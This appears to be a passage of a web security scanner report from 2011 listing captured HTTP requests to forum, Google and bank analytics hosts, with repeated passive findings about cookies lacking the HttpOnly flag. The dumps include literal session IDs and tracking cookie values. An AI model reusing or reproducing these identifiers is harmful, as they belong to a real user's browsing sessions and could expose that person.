GET /resources/documentation/index.html/_/documentation/getting-started/upgrading-r18 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /topic/330933-iptracker-200-released/ HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /topic/330971-ipnexus-113-released/ HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /topic/330971-ipnexus-113-released/page__view__findpost__p__2073390 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /topic/330971-ipnexus-113-released/page__view__getnewpost HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /topic/330971-ipnexus-113-released/page__view__new HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /topic/331075-so-far-disappointed-by-how-far-gallery-4-misses-the-mark/page__view__getlastpost HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /topic/331075-so-far-disappointed-by-how-far-gallery-4-misses-the-mark/page__view__getnewpost HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /topic/331381-namecheap/page__view__getlastpost HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /topic/331381-namecheap/page__view__getnewpost HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /topic/331383-convert-to-ipb/page__view__getlastpost HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /topic/331383-convert-to-ipb/page__view__getnewpost HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /topic/331395-ipnexus-12-dev-update-custom-customer-fields/page__view__getlastpost HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /topic/331395-ipnexus-12-dev-update-custom-customer-fields/page__view__getnewpost HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /topic/331399-images/page__view__getlastpost HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /topic/331399-images/page__view__getnewpost HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /topic/331403-custom-home-page/ HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /topic/331413-my-ipb-site-is-on-the-front-page-of-huffington-post/ HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /topic/331414-help-please/ HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /topic/331420-how-to-upgrade/ HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /topic/331420-how-to-upgrade/page__view__getlastpost HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /topic/331420-how-to-upgrade/page__view__getnewpost HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /topic/331421-how-to-upgrade/ HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /topic/331421-how-to-upgrade/page__view__getlastpost HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /topic/331421-how-to-upgrade/page__view__getnewpost HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /tracker/issue-21358-small-input-field-behavior-issue-after-updating-status/ HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The following cookie was issued by the application and does not have the HttpOnly flag set:
S=apphosting=lDi9AZW82FVRTOIu6kCZNw; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /og-dogfood-issue HTTP/1.1 Host: goto.ext.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Location: https://goto.google.com/og-dogfood-issue Set-Cookie: S=apphosting=lDi9AZW82FVRTOIu6kCZNw; path=/ Date: Thu, 03 Feb 2011 01:02:48 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-cache, must-revalidate Content-Type: text/html Server: Google Frontend Content-Length: 0 Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
S=apphosting=_A7v3AzE7Pn5yk9amuUM6w; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /og-exp HTTP/1.1 Host: goto.ext.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Location: https://goto.google.com/og-exp Set-Cookie: S=apphosting=_A7v3AzE7Pn5yk9amuUM6w; path=/ Date: Thu, 03 Feb 2011 01:02:48 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-cache, must-revalidate Content-Type: text/html Server: Google Frontend Content-Length: 0 Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /groups?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=wg HTTP/1.1 Host: groups.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /grphp HTTP/1.1 Host: groups.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en/index.html HTTP/1.1 Host: homeloanhelp.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 23:36:13 GMT Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2 Set-Cookie: PUBRETARGET=82_1389464380.78_1389464380.1113_1297450679.806_1325962677.1039_1297450683.445_1302634725.825_1297450726.1834_1297470581.1444_1298250150; domain=pubmatic.com; expires=Sat, 11-Jan-2014 18:19:40 GMT; path=/ Content-Length: 42 P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC" Cache-Control: no-store, no-cache, private Pragma: no-cache Connection: close Content-Type: image/gif
The following cookie was issued by the application and does not have the HttpOnly flag set:
s_vi_x60zgimfehkf=[CS]v4|0-0|4D49FEBF[CE]; Expires=Tue, 2 Feb 2016 01:02:55 GMT; Domain=.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/jpmcglobal,jpmorgan/1/H.21/s3515906694345 HTTP/1.1 Host: jpmorganchase.112.2o7.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26A4ED7A85148B7E-600001624041C7B6[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 01:02:55 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi_x60zgimfehkf=[CS]v4|0-0|4D49FEBF[CE]; Expires=Tue, 2 Feb 2016 01:02:55 GMT; Domain=.2o7.net; Path=/ Location: http://jpmorganchase.112.2o7.net/b/ss/jpmcglobal,jpmorgan/1/H.21/s3515906694345?AQB=1&pccr=true&g=none&AQE=1 X-C: ms-4.3.1 Expires: Wed, 02 Feb 2011 01:02:55 GMT Last-Modified: Fri, 04 Feb 2011 01:02:55 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www11 Content-Length: 0 Content-Type: text/plain Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
s_vi=[CS]v1|26A4ED7A85148B7E-600001624041C7B6[CE]; Expires=Mon, 1 Feb 2016 22:30:13 GMT; Domain=jpmorganchase.112.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/jpmcglobal,jpmorgan/1/H.21/s3515906694345?AQB=1&ndh=1&t=2/1/2011%2016%3A31%3A14%203%20360&ns=jpmorganchase&pageName=J.P.%20Morgan&g=http%3A//www.jpmorgan.com/pages/jpmorgan&r=http%3A//burp/show/20&cc=USD&c1=jpmorgan&c2=Generic_Content_Page_Template&c11=J.P.%20Morgan&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1036&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1 Host: jpmorganchase.112.2o7.net Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]
Response
HTTP/1.1 302 Found Date: Wed, 02 Feb 2011 22:30:13 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi=[CS]v1|26A4ED7A85148B7E-600001624041C7B6[CE]; Expires=Mon, 1 Feb 2016 22:30:13 GMT; Domain=jpmorganchase.112.2o7.net; Path=/ Location: http://jpmorganchase.112.2o7.net/b/ss/jpmcglobal,jpmorgan/1/H.21/s3515906694345?AQB=1&pccr=true&vidn=26A4ED7A85148B7E-600001624041C7B6&&ndh=1&t=2/1/2011%2016%3A31%3A14%203%20360&ns=jpmorganchase&pageName=J.P.%20Morgan&g=http%3A//www.jpmorgan.com/pages/jpmorgan&r=http%3A//burp/show/20&cc=USD&c1=jpmorgan&c2=Generic_Content_Page_Template&c11=J.P.%20Morgan&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1036&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 X-C: ms-4.3.1 Expires: Tue, 01 Feb 2011 22:30:13 GMT Last-Modified: Thu, 03 Feb 2011 22:30:13 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www218 Content-Length: 0 Content-Type: text/plain
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /adcedge/lb?site=695501&srvc=1&betr=citizensvisited_cs=1&betq=11980=427813 HTTP/1.1 Host: leadback.advertising.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=1791096;type=citi08ft;cat=homechar;ord=1;num=7738084758166.224? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ACID=Bc330012940999670074; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; GUID=MTI5NjQwODEwMDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; C2=HVCSNJpwHg02FN5BdbdRTewUwX0kH8Y4FN5BYTeRTeQ3gZ0kHQTnGN5BF2pRTeAohX0kHYZ4FN5BKGeRTewohX0kHca4FN5BiGeRTeQshX0kwOIAM/oBqJ7YBwAoGG5r1NQcKa4dGKmAI9YBxO53DkL3Fh3gPTw6TVEnsuWB/0mxpda7GIaWGbUrMaw41ZAVkqlB6bjxTr6bCwWZGG/r4fQsMasbwa3BW8oxu1I9HsfzFB3sNeQQoa0ks2zB1xmBmD; F1=BoUJI1EBAAAABAAAAIAAgEA; BASE=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!; ROLL=v5Q2W0MtUuzqOtGriBc3MVD!
Response
